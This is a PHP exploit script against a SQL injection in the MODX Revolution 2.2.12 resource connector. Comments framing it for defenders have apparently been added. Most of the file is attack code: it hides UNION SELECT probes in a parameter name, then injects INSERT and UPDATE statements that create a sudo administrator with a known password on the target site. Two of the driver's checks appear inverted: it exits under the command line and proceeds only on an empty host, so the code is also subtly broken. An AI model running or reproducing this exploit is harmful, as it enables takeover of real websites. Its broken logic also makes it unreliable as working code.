<?php
/**
 * Proof-of-concept for a SQL injection in the MODX Revolution 2.2.12
 * resource connector (see the banner printed by the driver below).
 *
 * Defensive reading: every request this class sends is an HTTP POST to
 * <host><CONNECTOR_PATH><connector> whose body carries a UNION SELECT,
 * INSERT or UPDATE fragment (with "+" standing in for whitespace) inside
 * a parameter name rather than a parameter value. That request shape is
 * what an access-log search or WAF rule should match on; inspection that
 * only looks at parameter values does not see it.
 */
class SqlInjection{
    // Value posted for the injected parameter; the driver also uses it as the default username.
    const UID = 'GaGaGa';
    // Path between the host and the connector script; the driver may override it from argv[2].
    static public $CONNECTOR_PATH = '/connectors/';
    // Table prefix of the targeted installation; the driver may override it from argv[3].
    static public $TABLE_PREFIX = 'modx_';
    // Response body of the "good" probe, cached by validate() for createUser() to compare against.
    static protected $goodRequest = null;

    /**
     * Probe fragment selecting from the users table with an id that is
     * expected to match no row; validate() pairs it with sqlGood().
     *
     * @return string
     */
    static protected function sqlBad(){
        $userTable = self::getTableName('users');
        return 'UNION+SELECT+id,username,password+FROM+'.$userTable.'+WHERE+id+IN(99999);';
    }

    /**
     * Probe fragment selecting the users row with id 1; validate() treats a
     * response that differs from sqlBad()'s as a positive.
     *
     * @return string
     */
    static protected function sqlGood(){
        $userTable = self::getTableName('users');
        return 'UNION+SELECT+id,username,password+FROM+'.$userTable.'+WHERE+id+IN(1);';
    }

    /**
     * Minimal POST helper with a 10-second overall timeout.
     *
     * @param string $url    Full URL to post to.
     * @param string $data   Raw request body passed to CURLOPT_POSTFIELDS.
     * @param array  $header Extra request headers; only applied when non-empty.
     * @return string|false Response body, or false when curl_exec() fails.
     */
    static public function curl($url, $data = '', array $header = array()){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_VERBOSE, false);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        if(!empty($header)){
            curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
        }
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_URL, $url);
        // NOTE(review): the handle is never released with curl_close(); it lives until the script ends.
        return curl_exec($ch);
    }

    /**
     * Sends the "bad" and "good" probes and compares the two response bodies
     * (loose !=). Differing bodies are taken as a positive, in which case the
     * "good" body is cached in self::$goodRequest.
     *
     * @param string $host Base URL as produced by makeHost().
     * @return bool
     */
    public static function validate($host){
        self::$goodRequest = null;
        $outBad = self::curl(self::makePath($host), self::makeUrl(self::sqlBad()));
        $outGood = self::curl(self::makePath($host), self::makeUrl(self::sqlGood()));
        $out = ( $outGood != $outBad );
        if($out){
            self::$goodRequest = $outGood;
        }
        return $out;
    }

    /**
     * Prefixes a bare table name with the configured table prefix.
     *
     * @param string $table
     * @return string
     */
    public static function getTableName($table){
        return self::$TABLE_PREFIX . $table;
    }

    /**
     * Builds the POST body around $sql: the trailing ';' is stripped, the
     * fragment is wrapped into a ctx[...] parameter name with every '='
     * percent-encoded, and UID is appended as the parameter value.
     *
     * @param string $sql
     * @return string
     */
    public static function makeUrl($sql){
        $sql = rtrim($sql, ';');
        return str_replace('=','%3D', 'ctx[rank`+IN+(666)+'.$sql.';/*]'). '=' . self::UID;
    }

    /**
     * Joins the host, the connector path and the connector script into the request URL.
     *
     * @param string $host
     * @param string $connector Connector script relative to CONNECTOR_PATH.
     * @return string
     */
    public static function makePath($host, $connector = 'resource/index.php'){
        return $host . self::$CONNECTOR_PATH . $connector;
    }

    /**
     * Normalises the host argument: takes the 'host' component of parse_url(),
     * falling back to 'path' (a bare "example.com" has no scheme, so parse_url()
     * reports it as the path), and prefixes "http://" when the result is non-empty.
     *
     * @param string $host
     * @return string Empty string when nothing usable was parsed.
     */
    public static function makeHost($host){
        $data = parse_url($host);
        $out = self::getParam('host', $data, self::getParam('path', $data));
        if(!empty($out)){
            $out = 'http://' . $out;
        }
        return $out;
    }

    /** Prints a blank line (showLog() with its defaults). */
    public static function br(){
        self::showLog();
    }

    /**
     * Prints $msg followed by a newline; with $br set, prints one more blank line.
     *
     * @param string $msg
     * @param bool   $br
     */
    public static function showLog($msg='', $br = false){
        print $msg."\n";
        if($br){
            self::br();
        }
    }

    /**
     * Issues three injected statements (insert a user row with a pre-computed
     * password hash and salt, insert a user_attributes row, then point its
     * internalKey at the new user's id) followed by a lookup of the new
     * username. Returns true only when validate() had cached a "good" response
     * and the lookup's response body equals it (loose ==).
     *
     * @param string $host     Base URL as produced by makeHost().
     * @param string $username Interpolated unescaped into the statements.
     * @return bool
     */
    public static function createUser($host, $username){
        $userTable = self::getTableName('users');
        $attributesTable = self::getTableName('user_attributes');
        $sql = 'INSERT+INTO+'.$userTable.'(`username`,`password`,`active`,`salt`,`primary_group`,`sudo`)+VALUES(\''.$username.'\',\'K/kCexN2TCvP4/L9w7i%2BIlzKfRVbH9MlhE4hXmD88Mw=\', 1, \'dd257bbc31dbe5c3518c95b592f5bfca\', 1, 1);';
        self::curl(self::makePath($host), self::makeUrl(self::sqlBad().$sql));
        $sql = 'INSERT+INTO+'.$attributesTable.'+(`email`,`blocked`)+VALUES+(\'fuckyoumodxrevolutionagain2@asdasd.ru\', 0)';
        self::curl(self::makePath($host), self::makeUrl(self::sqlBad().$sql));
        $sql = 'UPDATE+'.$attributesTable.'+SET+`internalKey`+=+(SELECT+`id`+FROM+'.$userTable.'+WHERE+`username`=\''.$username.'\'+LIMIT+1)+WHERE+`internalKey`+=+0';
        self::curl(self::makePath($host), self::makeUrl(self::sqlBad().$sql));
        $sql = 'UNION+SELECT+id,username,password+FROM+'.$userTable.'+WHERE+username+IN(\''.$username.'\')';
        $lastRequest = self::curl(self::makePath($host), self::makeUrl(self::sqlGood().$sql));
        return ( !empty(self::$goodRequest) && self::$goodRequest == $lastRequest );
    }

    /**
     * Array lookup with a default. Uses array_key_exists(), so a key that is
     * present with a null value yields null, not $default.
     *
     * @param int|string $key
     * @param array      $data
     * @param mixed      $default
     * @return mixed
     */
    public static function getParam($key, array $data = array(), $default = null){
        return array_key_exists($key, $data) ? $data[$key] : $default;
    }
}
// ---- command-line driver ----
// Prints the banner and usage, reads host / connector path / table prefix /
// username from $argv positions 1-4 (everything after the host is optional),
// then runs validate() and, on success, createUser().
if(php_sapi_name() === 'cli'){
    SqlInjection::showLog('Use command line');
    exit;
}
SqlInjection::showLog('/****************************************/');
SqlInjection::showLog('/* Exploit for MODX Revolution 2.2.12 */');
SqlInjection::showLog('/* Author: Agel_Nash */');
SqlInjection::showLog('/* Date: 05.03.2014 */');
SqlInjection::showLog('/****************************************/', true);
SqlInjection::showLog('Example: php '.basename(__FILE__).' host [connector_path] [table_prefix] [username]', true);
SqlInjection::br();
// Usage check: at least the host argument must be present.
if( !isset($argv) || !is_array($argv) || count($argv)<2 ){
    SqlInjection::showLog('Example: php revo2212.php example.com /connector/ modx_ test');
    exit;
}
$host = SqlInjection::makeHost(SqlInjection::getParam(1, $argv, ''));
// Optional overrides of the class defaults; UID doubles as the default username.
SqlInjection::$CONNECTOR_PATH = SqlInjection::getParam(2, $argv, SqlInjection::$CONNECTOR_PATH);
SqlInjection::$TABLE_PREFIX = SqlInjection::getParam(3, $argv, SqlInjection::$TABLE_PREFIX);
$userName = SqlInjection::getParam(4, $argv, SqlInjection::UID);
if( empty($host) && SqlInjection::validate($host) ){
    SqlInjection::showLog('Good validate');
    SqlInjection::showLog('Create sudo user "'.$userName.'" with password 123123123...');
    if(SqlInjection::createUser($host, $userName)){
        SqlInjection::showLog('Done');
    }else{
        SqlInjection::showLog('Error');
    }
}else{
    SqlInjection::showLog('Fail');
}